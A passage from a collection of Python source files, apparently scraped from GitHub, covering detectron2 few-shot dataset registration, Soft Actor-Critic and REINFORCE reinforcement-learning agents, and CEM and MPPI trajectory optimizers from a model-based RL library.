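    G_path="./data/graph/followers_graph.gexf",
    simulation_data_path="./data/simulations/simulation_500_results.csv",
    simulation_name="simulation_500",   # the "_500" part triggers the shared-layout path
    G_step_iterations=5,
    sprint_layout_calc=True,            # compute and cache the layout on the first run
)
```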
|
{
"source": "JeyesHan/DeFRCN_Custom",
"score": 2
}
|
#### File: defrcn/data/builtin.py
```python
import os
from .meta_voc import register_meta_voc, load_filtered_voc_instances
from .meta_coco import register_meta_coco
from .builtin_meta import _get_builtin_metadata
from detectron2.data import DatasetCatalog, MetadataCatalog
# -------- COCO -------- #
def register_all_coco(root="datasets"):
METASPLITS = [
("coco14_trainval_all", "coco/trainval2014", "cocosplit/datasplit/trainvalno5k.json"),
("coco14_trainval_base", "coco/trainval2014", "cocosplit/datasplit/trainvalno5k.json"),
("coco14_test_all", "coco/val2014", "cocosplit/datasplit/5k.json"),
("coco14_test_base", "coco/val2014", "cocosplit/datasplit/5k.json"),
("coco14_test_novel", "coco/val2014", "cocosplit/datasplit/5k.json"),
]
for prefix in ["all", "novel"]:
for shot in [1, 2, 3, 5, 10, 30]:
for seed in range(10):
name = "coco14_trainval_{}_{}shot_seed{}".format(prefix, shot, seed)
METASPLITS.append((name, "coco/trainval2014", ""))
for name, imgdir, annofile in METASPLITS:
register_meta_coco(
name,
_get_builtin_metadata("coco_fewshot"),
os.path.join(root, imgdir),
os.path.join(root, annofile),
)
# -------- PASCAL VOC -------- #
def register_all_voc(root="datasets"):
METASPLITS = [
("voc_2007_trainval_base1", "VOC2007", "trainval", "base1", 1),
("voc_2007_trainval_base2", "VOC2007", "trainval", "base2", 2),
("voc_2007_trainval_base3", "VOC2007", "trainval", "base3", 3),
("voc_2012_trainval_base1", "VOC2012", "trainval", "base1", 1),
("voc_2012_trainval_base2", "VOC2012", "trainval", "base2", 2),
("voc_2012_trainval_base3", "VOC2012", "trainval", "base3", 3),
("voc_2007_trainval_all1", "VOC2007", "trainval", "base_novel_1", 1),
("voc_2007_trainval_all2", "VOC2007", "trainval", "base_novel_2", 2),
("voc_2007_trainval_all3", "VOC2007", "trainval", "base_novel_3", 3),
("voc_2012_trainval_all1", "VOC2012", "trainval", "base_novel_1", 1),
("voc_2012_trainval_all2", "VOC2012", "trainval", "base_novel_2", 2),
("voc_2012_trainval_all3", "VOC2012", "trainval", "base_novel_3", 3),
("voc_2007_test_base1", "VOC2007", "test", "base1", 1),
("voc_2007_test_base2", "VOC2007", "test", "base2", 2),
("voc_2007_test_base3", "VOC2007", "test", "base3", 3),
("voc_2007_test_novel1", "VOC2007", "test", "novel1", 1),
("voc_2007_test_novel2", "VOC2007", "test", "novel2", 2),
("voc_2007_test_novel3", "VOC2007", "test", "novel3", 3),
("voc_2007_test_all1", "VOC2007", "test", "base_novel_1", 1),
("voc_2007_test_all2", "VOC2007", "test", "base_novel_2", 2),
("voc_2007_test_all3", "VOC2007", "test", "base_novel_3", 3),
]
for prefix in ["all", "novel"]:
for sid in range(1, 4):
for shot in [1, 2, 3, 5, 10]:
for year in [2007, 2012]:
for seed in range(30):
seed = "_seed{}".format(seed)
name = "voc_{}_trainval_{}{}_{}shot{}".format(
year, prefix, sid, shot, seed
)
dirname = "VOC{}".format(year)
img_file = "{}_{}shot_split_{}_trainval".format(
prefix, shot, sid
)
keepclasses = (
"base_novel_{}".format(sid)
if prefix == "all"
else "novel{}".format(sid)
)
METASPLITS.append(
(name, dirname, img_file, keepclasses, sid)
)
for name, dirname, split, keepclasses, sid in METASPLITS:
year = 2007 if "2007" in name else 2012
register_meta_voc(
name,
_get_builtin_metadata("voc_fewshot"),
os.path.join(root, dirname),
split,
year,
keepclasses,
sid,
)
MetadataCatalog.get(name).evaluator_type = "pascal_voc"
register_all_coco()
register_all_voc()
# register custom dataset
def register_custom(name, dirname, split, year, thing_classes):
DatasetCatalog.register(
name,
lambda: load_filtered_voc_instances(
name, dirname, split, thing_classes
),
)
MetadataCatalog.get(name).set(
thing_classes=thing_classes,
dirname=dirname,
year=year,
split=split,
evaluator_type = "pascal_voc",
base_classes=thing_classes,
novel_classes=[],
)
# register_custom("robot_competition_voc_trainval", "/home/hanj/pyprojects/robot_competition", "trainval", 2007, ['purple bottle', 'biscuit', 'apple'])
# register_custom("robot_competition_voc_test", "/home/hanj/pyprojects/robot_competition", "test", 2007, ['purple bottle', 'biscuit', 'apple'])
register_custom("robot_competition_voc_trainval", "/home/hanj/pyprojects/robot_initial/stepx", "trainval", 2007, ['purple bottle', 'biscuit', 'apple'])
register_custom("robot_competition_voc_test", "/home/hanj/pyprojects/robot_test", "test", 2007, ['purple bottle', 'biscuit', 'apple'])
```
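Once registered, the custom split can be pulled back through detectron2's catalogs; a short hedged sketch (the dataset name matches the `register_custom` call above, and the VOC files must exist on disk for the loader to succeed):
```python
# Sketch only: consume the registered split through detectron2's catalogs.
dataset_dicts = DatasetCatalog.get("robot_competition_voc_trainval")
metadata = MetadataCatalog.get("robot_competition_voc_trainval")
print(len(dataset_dicts), "images; classes:", metadata.thing_classes)
```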
|
{
"source": "Jeyhooon/deep-reinforcement-learning",
"score": 2
}
|
#### File: p2_continuous_control/sac_agent/main.py
```python
import argparse
import numpy as np
import torch
from torch import optim
import pathlib
import os
import matplotlib.pyplot as plt
from datetime import date
from unityagents import UnityEnvironment
from scripts.agent import SACAgent
from scripts import utils
os.chdir(pathlib.Path(__file__).parent.absolute())
RESULTS_DIR = os.path.join('results')
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
config = {
"ROOT_DIR": "results", # directory to save the results
"BUFFER_SIZE": int(1e6), # replay buffer size
"BATCH_SIZE": 256, # mini-batch size
"WARMUP_BATCHES": 10, # number of initial batches to fill the buffer with
"TAU": 5e-3, # for soft update of target parameters
"UPDATE_EVERY": 1, # how often to update the network
"SEED": [1], # list of the seed to do randomize each training
"Q_NET_Hidden_Dims": (128, 128), # Size of the hidden layer in Q-Net
"Q_LR": 7e-4, # Q-Net learning rate
"Q_MAX_GRAD_NORM": float('inf'), # to clip gradients of Q-Net
"POLICY_NET_Hidden_Dims": (64, 64), # Size of the hidden layer in Policy-Net
"POLICY_LR": 5e-4, # Policy-Net learning rate
"POLICY_MAX_GRAD_NORM": float('inf'), # to clip gradients of the Policy-Net
"ENV_SETTINGS": {
'ENV_NAME': 'Reacher_Linux/Reacher.x86_64',
'GAMMA': 0.99,
'MAX_MINUTES': 300,
'MAX_EPISODES': 10000,
'GOAL_MEAN_100_REWARD': 30
}
}
def create_agent(config):
policy_model_fn = lambda nS, bounds: utils.GaussianPolicyNet(nS, bounds, hidden_dims=config["POLICY_NET_Hidden_Dims"])
policy_optimizer_fn = lambda net, lr: optim.Adam(net.parameters(), lr=lr)
value_model_fn = lambda nS, nA: utils.QNet(nS, nA, hidden_dims=config["Q_NET_Hidden_Dims"])
value_optimizer_fn = lambda net, lr: optim.Adam(net.parameters(), lr=lr)
replay_buffer_fn = lambda: utils.ReplayBuffer(buffer_size=config["BUFFER_SIZE"], batch_size=config["BATCH_SIZE"])
return SACAgent(replay_buffer_fn,
policy_model_fn,
policy_optimizer_fn,
value_model_fn,
value_optimizer_fn,
config)
def process_results(results, root_dir: str):
'''
    Extracts relevant information, plots and saves the results.
'''
max_total_steps, max_episode_reward, max_100_reward, max_100_score, \
max_train_time, max_wall_time = np.max(results, axis=0).T
min_total_steps, min_episode_reward, min_100_reward, min_100_score, \
min_train_time, min_wall_time = np.min(results, axis=0).T
mean_total_steps, mean_episode_reward, mean_100_reward, mean_100_score, \
mean_train_time, mean_wall_time = np.mean(results, axis=0).T
x = np.arange(len(mean_100_score))
stats_dict = {
'x': x,
'max_100_reward': max_100_reward,
'min_100_reward': min_100_reward,
'mean_100_reward': mean_100_reward,
'max_100_score': max_100_score,
'min_100_score': min_100_score,
'mean_100_score': mean_100_score,
'max_total_steps': max_total_steps,
'min_total_steps': min_total_steps,
'mean_total_steps': mean_total_steps,
'max_train_time': max_train_time,
'min_train_time': min_train_time,
'mean_train_time': mean_train_time,
'max_wall_time': max_wall_time,
'min_wall_time': min_wall_time,
'mean_wall_time': mean_wall_time
}
data_path = os.path.join(root_dir, 'stats_dict.pth')
torch.save(stats_dict, data_path)
print(f"Processed Data Saved to: {data_path}")
# Plot the Learning Curve
fig, axs = plt.subplots(2, 1, figsize=(15, 10), sharey=False, sharex=True)
axs[0].plot(max_100_reward, 'g', linewidth=1)
axs[0].plot(min_100_reward, 'g', linewidth=1)
axs[0].plot(mean_100_reward, 'g:', label='SAC', linewidth=2)
axs[0].fill_between(
x, min_100_reward, max_100_reward, facecolor='g', alpha=0.3)
axs[1].plot(max_episode_reward, 'g', linewidth=1)
axs[1].plot(min_episode_reward, 'g', linewidth=1)
axs[1].plot(mean_episode_reward, 'g:', label='SAC', linewidth=2)
axs[1].fill_between(
x, min_episode_reward, max_episode_reward, facecolor='g', alpha=0.3)
axs[0].set_title('Moving Avg. Last_100_Episode_Reward (Training)')
axs[1].set_title('Mean Episode Rewards (Training)')
plt.xlabel('Episodes')
axs[0].legend(loc='upper left')
lc_path = os.path.join(root_dir, 'learning_curve.png')
plt.savefig(lc_path)
print(f"Learning-Curve Saved to: {lc_path}")
plt.show()
# Plot training time stats
fig, axs = plt.subplots(3, 1, figsize=(15, 15), sharey=False, sharex=True)
axs[0].plot(max_total_steps, 'g', linewidth=1)
axs[0].plot(min_total_steps, 'g', linewidth=1)
axs[0].plot(mean_total_steps, 'g:', label='SAC', linewidth=2)
axs[0].fill_between(x, min_total_steps, max_total_steps, facecolor='g', alpha=0.3)
axs[1].plot(max_train_time, 'g', linewidth=1)
axs[1].plot(min_train_time, 'g', linewidth=1)
axs[1].plot(mean_train_time, 'g:', label='SAC', linewidth=2)
axs[1].fill_between(x, min_train_time, max_train_time, facecolor='g', alpha=0.3)
axs[2].plot(max_wall_time, 'g', linewidth=1)
axs[2].plot(min_wall_time, 'g', linewidth=1)
axs[2].plot(mean_wall_time, 'g:', label='SAC', linewidth=2)
axs[2].fill_between(x, min_wall_time, max_wall_time, facecolor='g', alpha=0.3)
axs[0].set_title('Total Steps')
axs[1].set_title('Training Time')
axs[2].set_title('Wall-clock Time')
plt.xlabel('Episodes')
axs[0].legend(loc='upper left')
tc_path = os.path.join(root_dir, 'training_time_stats.png')
plt.savefig(tc_path)
print(f"Training-Time-Stats Saved to: {tc_path}")
plt.show()
def train(env):
# Creating the required directories
current_date = str(date.today()).replace('-', '_')
current_time = utils.get_date_time_now()
config["ROOT_DIR"] = os.path.join(config["ROOT_DIR"], current_date, current_time)
os.makedirs(config["ROOT_DIR"], exist_ok=True)
exp_results = []
best_agent, best_eval_score = None, float('-inf')
for seed in config["SEED"]:
_, gamma, max_minutes, max_episodes, goal_mean_100_reward = config["ENV_SETTINGS"].values()
agent = create_agent(config)
result, final_eval_score, training_time, wallclock_time = agent.train(env,
seed,
gamma,
max_minutes,
max_episodes,
goal_mean_100_reward)
exp_results.append(result)
if final_eval_score > best_eval_score:
best_eval_score = final_eval_score
best_agent = agent
process_results(exp_results, config["ROOT_DIR"])
return best_agent
if __name__ == "__main__":
# Parsing the arguments
parser = argparse.ArgumentParser()
    # argparse's type=bool treats any non-empty string (even "False") as True, so parse explicitly
    parser.add_argument('--is_training', type=lambda s: str(s).lower() in ('1', 'true', 'yes'),
                        default=True, help='Train otherwise Test/Eval')
parser.add_argument('--load_dir', type=str, default=None, help='Directory to load the model from')
args = parser.parse_args()
env_name, gamma, max_minutes, max_episodes, goal_mean_100_reward = config["ENV_SETTINGS"].values()
env = UnityEnvironment(file_name=env_name, seed=config["SEED"][0])
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
env_info = env.reset(train_mode=False)[brain_name] # reset the environment
# number of agents in the environment
print('Number of Agents:', len(env_info.agents))
# number of actions
action_size = brain.vector_action_space_size
print('Action Size:', action_size)
# examine the state space
state = env_info.vector_observations[0]
print('States look like:', state)
state_size = len(state)
print('State Size:', state_size)
# watch an untrained agent
agent = create_agent(config)
env_info = env.reset(train_mode=False)[brain_name]
action_bounds = [-1 for _ in range(action_size)], [1 for _ in range(action_size)]
agent.setup(state_size, action_size, action_bounds)
state = env_info.vector_observations[0]
score = 0 # initialize the score
for _ in range(50):
action = agent.policy_model.select_action(state) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.vector_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("UnTrained Agent's Score: {}".format(score))
if args.is_training:
agent = train(env)
args.load_dir = config["ROOT_DIR"]
# load the weights from the file
assert args.load_dir is not None
trained_policy = utils.load_checkpoint(model=agent.policy_model, path=args.load_dir)
# watch the trained agent
score = 0 # initialize the score
env_info = env.reset(train_mode=False)[brain_name]
state = env_info.vector_observations[0]
while True:
action = trained_policy.select_action(state) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.vector_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("Trained Agent's Score: {}".format(score))
print("Experiment Finished! ... Closing the Environment ...")
env.close()
```
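The `config` dictionary at the top of the script drives both the agent and the training loop; a hedged sketch of overriding a few hyperparameters before launching (the values below are arbitrary examples, not recommended settings):
```python
# Sketch only: tweak the config before training; the keys are the ones defined above.
config["BATCH_SIZE"] = 128
config["SEED"] = [1, 2, 3]                        # three seeded runs, averaged by process_results
config["ENV_SETTINGS"]["MAX_EPISODES"] = 2000
# env = UnityEnvironment(file_name=config["ENV_SETTINGS"]["ENV_NAME"], seed=config["SEED"][0])
# best_agent = train(env)
```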
|
{
"source": "Jeyhooon/gdrl",
"score": 2
}
|
#### File: gdrl/scripts/agent_reinforce.py
```python
import torch
import numpy as np
import time
import tempfile
import random
from itertools import count
import gc
import os
import glob
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import utils
default_variables_dict = utils.get_default_variable_dict()
LEAVE_PRINT_EVERY_N_SECS = default_variables_dict["LEAVE_PRINT_EVERY_N_SECS"]
ERASE_LINE = default_variables_dict["ERASE_LINE"]
class REINFORCE:
def __init__(self):
self.policy_model_fn = lambda nS, nA: PolicyNet(nS, nA, hidden_dims=(128, 64))
self.policy_optimizer_fn = lambda net, lr: optim.Adam(net.parameters(), lr=lr)
self.policy_optimizer_lr = 0.0005
def optimize_model(self):
T = len(self.rewards)
discounts = np.logspace(0, T, num=T, base=self.gamma, endpoint=False)
returns = np.array([np.sum(discounts[: T -t] * self.rewards[t:]) for t in range(T)])
discounts = torch.FloatTensor(discounts).unsqueeze(1)
returns = torch.FloatTensor(returns).unsqueeze(1)
self.logpas = torch.cat(self.logpas) # log probability of the actions selected
# pytorch does gradient descent by default --> minimizing negative performance is like max. performance
# log probability of actions selected is weighted by their discounted returns
policy_loss = -(discounts * returns * self.logpas).mean()
self.policy_optimizer.zero_grad()
policy_loss.backward()
self.policy_optimizer.step()
def interaction_step(self, state, env):
action, is_exploratory, logpa, _ = self.policy_model.full_pass(state)
new_state, reward, is_terminal, _ = env.step(action)
self.logpas.append(logpa)
self.rewards.append(reward)
self.episode_reward[-1] += reward
self.episode_timestep[-1] += 1
self.episode_exploration[-1] += int(is_exploratory)
return new_state, is_terminal
# this function is the entry point for training the agent
def train(self, make_env_fn, make_env_kargs, seed, gamma,
max_minutes, max_episodes, goal_mean_100_reward):
training_start, last_debug_time = time.time(), float('-inf')
self.checkpoint_dir = tempfile.mkdtemp()
self.make_env_fn = make_env_fn
self.make_env_kargs = make_env_kargs
self.seed = seed
self.gamma = gamma
env = self.make_env_fn(**self.make_env_kargs, seed=self.seed)
torch.manual_seed(self.seed) ; np.random.seed(self.seed) ; random.seed(self.seed)
state_dim, acts_dim = env.observation_space.shape[0], env.action_space.n
self.episode_timestep = []
self.episode_reward = []
self.episode_seconds = []
self.episode_exploration = []
self.evaluation_scores = []
self.policy_model = self.policy_model_fn(state_dim, acts_dim)
self.policy_optimizer = self.policy_optimizer_fn(self.policy_model,
self.policy_optimizer_lr)
result = np.empty((max_episodes, 5))
result[:] = np.nan
training_time = 0
for episode in range(1, max_episodes + 1):
episode_start = time.time()
state, is_terminal = env.reset(), False
self.episode_reward.append(0.0)
self.episode_timestep.append(0.0)
self.episode_exploration.append(0.0)
# collect rollout
self.logpas, self.rewards = [], []
for step in count():
state, is_terminal = self.interaction_step(state, env)
if is_terminal:
gc.collect()
break
self.optimize_model()
# stats
episode_elapsed = time.time() - episode_start
self.episode_seconds.append(episode_elapsed)
training_time += episode_elapsed
evaluation_score, _ = self.evaluate(self.policy_model, env)
utils.save_checkpoint(self.checkpoint_dir, episode-1, self.policy_model)
total_step = int(np.sum(self.episode_timestep))
self.evaluation_scores.append(evaluation_score)
mean_10_reward = np.mean(self.episode_reward[-10:])
std_10_reward = np.std(self.episode_reward[-10:])
mean_100_reward = np.mean(self.episode_reward[-100:])
std_100_reward = np.std(self.episode_reward[-100:])
mean_100_eval_score = np.mean(self.evaluation_scores[-100:])
std_100_eval_score = np.std(self.evaluation_scores[-100:])
            lst_100_exp_rat = np.array(
                self.episode_exploration[-100:]) / np.array(self.episode_timestep[-100:])
mean_100_exp_rat = np.mean(lst_100_exp_rat)
std_100_exp_rat = np.std(lst_100_exp_rat)
wallclock_elapsed = time.time() - training_start
result[episode -1] = total_step, mean_100_reward, \
mean_100_eval_score, training_time, wallclock_elapsed
reached_debug_time = time.time() - last_debug_time >= LEAVE_PRINT_EVERY_N_SECS
reached_max_minutes = wallclock_elapsed >= max_minutes * 60
reached_max_episodes = episode >= max_episodes
reached_goal_mean_reward = mean_100_eval_score >= goal_mean_100_reward
training_is_over = reached_max_minutes or \
reached_max_episodes or \
reached_goal_mean_reward
elapsed_str = time.strftime("%H:%M:%S", time.gmtime(time.time() - training_start))
debug_message = 'el {}, ep {:04}, ts {:06}, '
debug_message += 'ar 10 {:05.1f}\u00B1{:05.1f}, '
debug_message += '100 {:05.1f}\u00B1{:05.1f}, '
debug_message += 'ex 100 {:02.1f}\u00B1{:02.1f}, '
debug_message += 'ev {:05.1f}\u00B1{:05.1f}'
debug_message = debug_message.format(
elapsed_str, episode -1, total_step, mean_10_reward, std_10_reward,
mean_100_reward, std_100_reward, mean_100_exp_rat, std_100_exp_rat,
mean_100_eval_score, std_100_eval_score)
print(debug_message, end='\r', flush=True)
if reached_debug_time or training_is_over:
print(ERASE_LINE + debug_message, flush=True)
last_debug_time = time.time()
if training_is_over:
if reached_max_minutes: print(u'--> reached_max_minutes \u2715')
if reached_max_episodes: print(u'--> reached_max_episodes \u2715')
if reached_goal_mean_reward: print(u'--> reached_goal_mean_reward \u2713')
break
final_eval_score, score_std = self.evaluate(self.policy_model, env, n_episodes=100)
wallclock_time = time.time() - training_start
print('Training complete.')
print('Final evaluation score {:.2f}\u00B1{:.2f} in {:.2f}s training time,'
' {:.2f}s wall-clock time.\n'.format(
final_eval_score, score_std, training_time, wallclock_time))
env.close() ; del env
self.get_cleaned_checkpoints()
return result, final_eval_score, training_time, wallclock_time
def evaluate(self, eval_policy_model, eval_env, n_episodes=1, greedy=True):
rs = []
for _ in range(n_episodes):
s, d = eval_env.reset(), False
rs.append(0)
for _ in count():
if greedy:
a = eval_policy_model.select_greedy_action(s)
else:
a = eval_policy_model.select_action(s)
s, r, d, _ = eval_env.step(a)
rs[-1] += r
if d: break
return np.mean(rs), np.std(rs)
def get_cleaned_checkpoints(self, n_checkpoints=5):
try:
return self.checkpoint_paths
except AttributeError:
self.checkpoint_paths = {}
paths = glob.glob(os.path.join(self.checkpoint_dir, '*.tar'))
paths_dic = {int(path.split('.')[-2]) :path for path in paths}
last_ep = max(paths_dic.keys())
            # checkpoint_idxs = np.geomspace(1, last_ep + 1, n_checkpoints, endpoint=True, dtype=int) - 1
            checkpoint_idxs = np.linspace(1, last_ep + 1, n_checkpoints, endpoint=True, dtype=int) - 1
for idx, path in paths_dic.items():
if idx in checkpoint_idxs:
self.checkpoint_paths[idx] = path
else:
os.unlink(path)
return self.checkpoint_paths
def demo_last(self, title='{} Agent - Fully Trained ', n_episodes=3, max_n_videos=3):
env = self.make_env_fn(**self.make_env_kargs, monitor_mode='evaluation', render=True, record=True)
title = title.format(self.__class__.__name__)
checkpoint_paths = self.get_cleaned_checkpoints()
last_ep = max(checkpoint_paths.keys())
self.policy_model.load_state_dict(torch.load(checkpoint_paths[last_ep]))
self.evaluate(self.policy_model, env, n_episodes=n_episodes)
env.close()
html_data = utils.get_gif_html(env_videos=env.videos,
title=title,
max_n_videos=max_n_videos)
del env
return html_data, title
def demo_progression(self, title='{} Agent - Progression', max_n_videos=5):
env = self.make_env_fn(**self.make_env_kargs, monitor_mode='evaluation', render=True, record=True)
title = title.format(self.__class__.__name__)
checkpoint_paths = self.get_cleaned_checkpoints()
for i in sorted(checkpoint_paths.keys()):
self.policy_model.load_state_dict(torch.load(checkpoint_paths[i]))
self.evaluate(self.policy_model, env, n_episodes=1)
env.close()
html_data = utils.get_gif_html(env_videos=env.videos,
title=title,
subtitle_eps=sorted(checkpoint_paths.keys()),
max_n_videos=max_n_videos)
del env
return html_data, title
class PolicyNet(nn.Module):
def __init__(self,
input_dim,
output_dim,
hidden_dims=(32, 32),
activation_fc=F.relu):
super(PolicyNet, self).__init__()
self.activation_fc = activation_fc
self.input_layer = nn.Linear(input_dim, hidden_dims[0])
self.hidden_layers = nn.ModuleList()
for i in range(len(hidden_dims) - 1):
hidden_layer = nn.Linear(hidden_dims[i], hidden_dims[i + 1])
self.hidden_layers.append(hidden_layer)
self.output_layer = nn.Linear(hidden_dims[-1], output_dim)
def _format(self, state):
x = state
if not isinstance(x, torch.Tensor):
x = torch.tensor(x,
dtype=torch.float32)
x = x.unsqueeze(0)
return x
def forward(self, state):
x = self._format(state)
x = self.activation_fc(self.input_layer(x))
for hidden_layer in self.hidden_layers:
x = self.activation_fc(hidden_layer(x))
return self.output_layer(x)
def full_pass(self, state):
logits = self.forward(state)
dist = torch.distributions.Categorical(logits=logits)
action = dist.sample()
logpa = dist.log_prob(action).unsqueeze(-1)
entropy = dist.entropy().unsqueeze(-1)
is_exploratory = action != np.argmax(logits.detach().numpy())
return action.item(), is_exploratory.item(), logpa, entropy
def select_action(self, state):
logits = self.forward(state)
dist = torch.distributions.Categorical(logits=logits)
action = dist.sample()
return action.item()
def select_greedy_action(self, state):
logits = self.forward(state)
return np.argmax(logits.detach().numpy())
```
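The return computation in `optimize_model` can be checked in isolation; a small numeric sketch with `gamma = 0.99` and three rewards:
```python
# Standalone check of the discounted-return computation used in optimize_model.
import numpy as np

gamma, rewards = 0.99, [1.0, 0.0, 2.0]
T = len(rewards)
discounts = np.logspace(0, T, num=T, base=gamma, endpoint=False)   # [1.0, 0.99, 0.9801]
returns = np.array([np.sum(discounts[: T - t] * rewards[t:]) for t in range(T)])
print(returns)  # [2.9602, 1.98, 2.0] -> G_t = sum_k gamma**k * r_{t+k}
```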
|
{
"source": "Jeyhooon/mbrl-lib",
"score": 3
}
|
#### File: mbrl/planning/trajectory_opt.py
```python
import time
from typing import Callable, List, Optional, Sequence, cast
import hydra
import numpy as np
import omegaconf
import torch
import torch.distributions
import mbrl.models
import mbrl.types
import mbrl.util.math
from .core import Agent, complete_agent_cfg
class Optimizer:
def __init__(self):
pass
def optimize(
self,
obj_fun: Callable[[torch.Tensor], torch.Tensor],
x0: Optional[torch.Tensor] = None,
**kwargs,
) -> torch.Tensor:
"""Runs optimization.
Args:
obj_fun (callable(tensor) -> tensor): objective function to maximize.
x0 (tensor, optional): initial solution, if necessary.
Returns:
(torch.Tensor): the best solution found.
"""
pass
class CEMOptimizer(Optimizer):
"""Implements the Cross-Entropy Method optimization algorithm.
A good description of CEM [1] can be found at https://arxiv.org/pdf/2008.06389.pdf. This
code implements the version described in Section 2.1, labeled CEM_PETS
(but note that the shift-initialization between planning time steps is handled outside of
this class by TrajectoryOptimizer).
This implementation also returns the best solution found as opposed
to the mean of the last generation.
Args:
num_iterations (int): the number of iterations (generations) to perform.
elite_ratio (float): the proportion of the population that will be kept as
elite (rounds up).
population_size (int): the size of the population.
lower_bound (sequence of floats): the lower bound for the optimization variables.
upper_bound (sequence of floats): the upper bound for the optimization variables.
alpha (float): momentum term.
device (torch.device): device where computations will be performed.
return_mean_elites (bool): if ``True`` returns the mean of the elites of the last
iteration. Otherwise, it returns the max solution found over all iterations.
[1] <NAME> and <NAME>. "The cross-entropy method for combinatorial and continuous
optimization". Methodology and Computing in Applied Probability, 1999.
"""
def __init__(
self,
num_iterations: int,
elite_ratio: float,
population_size: int,
lower_bound: Sequence[Sequence[float]],
upper_bound: Sequence[Sequence[float]],
alpha: float,
device: torch.device,
return_mean_elites: bool = False,
):
super().__init__()
self.num_iterations = num_iterations
self.elite_ratio = elite_ratio
self.population_size = population_size
self.elite_num = np.ceil(self.population_size * self.elite_ratio).astype(
np.int32
)
self.lower_bound = torch.tensor(lower_bound, device=device, dtype=torch.float32)
self.upper_bound = torch.tensor(upper_bound, device=device, dtype=torch.float32)
self.initial_var = ((self.upper_bound - self.lower_bound) ** 2) / 16
self.alpha = alpha
self.return_mean_elites = return_mean_elites
self.device = device
def optimize(
self,
obj_fun: Callable[[torch.Tensor], torch.Tensor],
x0: Optional[torch.Tensor] = None,
callback: Optional[Callable[[torch.Tensor, torch.Tensor, int], None]] = None,
**kwargs,
) -> torch.Tensor:
"""Runs the optimization using CEM.
Args:
obj_fun (callable(tensor) -> tensor): objective function to maximize.
x0 (tensor, optional): initial mean for the population. Must
be consistent with lower/upper bounds.
callback (callable(tensor, tensor, int) -> any, optional): if given, this
function will be called after every iteration, passing it as input the full
population tensor, its corresponding objective function values, and
the index of the current iteration. This can be used for logging and plotting
purposes.
Returns:
(torch.Tensor): the best solution found.
"""
mu = x0.clone()
var = self.initial_var.clone()
best_solution = torch.empty_like(mu)
best_value = -np.inf
population = torch.zeros((self.population_size,) + x0.shape).to(
device=self.device
)
for i in range(self.num_iterations):
lb_dist = mu - self.lower_bound
ub_dist = self.upper_bound - mu
mv = torch.min(torch.square(lb_dist / 2), torch.square(ub_dist / 2))
constrained_var = torch.min(mv, var)
population = mbrl.util.math.truncated_normal_(population)
population = population * torch.sqrt(constrained_var) + mu
values = obj_fun(population)
if callback is not None:
callback(population, values, i)
            # replace NaN objective values so they can never be selected as elites
            values[values.isnan()] = -1e-10
best_values, elite_idx = values.topk(self.elite_num)
elite = population[elite_idx]
new_mu = torch.mean(elite, dim=0)
new_var = torch.var(elite, unbiased=False, dim=0)
mu = self.alpha * mu + (1 - self.alpha) * new_mu
var = self.alpha * var + (1 - self.alpha) * new_var
if best_values[0] > best_value:
best_value = best_values[0]
best_solution = population[elite_idx[0]].clone()
return mu if self.return_mean_elites else best_solution
class MPPIOptimizer(Optimizer):
"""Implements the Model Predictive Path Integral optimization algorithm.
A derivation of MPPI can be found at https://arxiv.org/abs/2102.09027
This version is closely related to the original TF implementation used in PDDM with
some noise sampling modifications and the addition of refinement steps.
Args:
num_iterations (int): the number of iterations (generations) to perform.
population_size (int): the size of the population.
gamma (float): reward scaling term.
sigma (float): noise scaling term used in action sampling.
beta (float): correlation term between time steps.
lower_bound (sequence of floats): the lower bound for the optimization variables.
upper_bound (sequence of floats): the upper bound for the optimization variables.
device (torch.device): device where computations will be performed.
"""
def __init__(
self,
num_iterations: int,
population_size: int,
gamma: float,
sigma: float,
beta: float,
lower_bound: Sequence[Sequence[float]],
upper_bound: Sequence[Sequence[float]],
device: torch.device,
):
super().__init__()
self.planning_horizon = len(lower_bound)
self.population_size = population_size
self.action_dimension = len(lower_bound[0])
self.mean = torch.zeros(
(self.planning_horizon, self.action_dimension),
device=device,
dtype=torch.float32,
)
self.lower_bound = torch.tensor(lower_bound, device=device, dtype=torch.float32)
self.upper_bound = torch.tensor(upper_bound, device=device, dtype=torch.float32)
self.var = sigma ** 2 * torch.ones_like(self.lower_bound)
self.beta = beta
self.gamma = gamma
self.refinements = num_iterations
self.device = device
def optimize(
self,
obj_fun: Callable[[torch.Tensor], torch.Tensor],
x0: Optional[torch.Tensor] = None,
callback: Optional[Callable[[torch.Tensor, torch.Tensor, int], None]] = None,
**kwargs,
) -> torch.Tensor:
"""Implementation of MPPI planner.
Args:
obj_fun (callable(tensor) -> tensor): objective function to maximize.
x0 (tensor, optional): Not required
callback (callable(tensor, tensor, int) -> any, optional): if given, this
function will be called after every iteration, passing it as input the full
population tensor, its corresponding objective function values, and
the index of the current iteration. This can be used for logging and plotting
purposes.
Returns:
(torch.Tensor): the best solution found.
"""
past_action = self.mean[0]
self.mean[:-1] = self.mean[1:].clone()
for k in range(self.refinements):
# sample noise and update constrained variances
noise = torch.empty(
size=(
self.population_size,
self.planning_horizon,
self.action_dimension,
),
device=self.device,
)
noise = mbrl.util.math.truncated_normal_(noise)
lb_dist = self.mean - self.lower_bound
ub_dist = self.upper_bound - self.mean
mv = torch.minimum(torch.square(lb_dist / 2), torch.square(ub_dist / 2))
constrained_var = torch.minimum(mv, self.var)
population = noise.clone() * torch.sqrt(constrained_var)
# smoothed actions with noise
population[:, 0, :] = (
self.beta * (self.mean[0, :] + noise[:, 0, :])
+ (1 - self.beta) * past_action
)
for i in range(max(self.planning_horizon - 1, 0)):
population[:, i + 1, :] = (
self.beta * (self.mean[i + 1] + noise[:, i + 1, :])
+ (1 - self.beta) * population[:, i, :]
)
# clipping actions
# This should still work if the bounds between dimensions are different.
population = torch.where(
population > self.upper_bound, self.upper_bound, population
)
population = torch.where(
population < self.lower_bound, self.lower_bound, population
)
values = obj_fun(population)
values[values.isnan()] = -1e-10
if callback is not None:
callback(population, values, k)
# weight actions
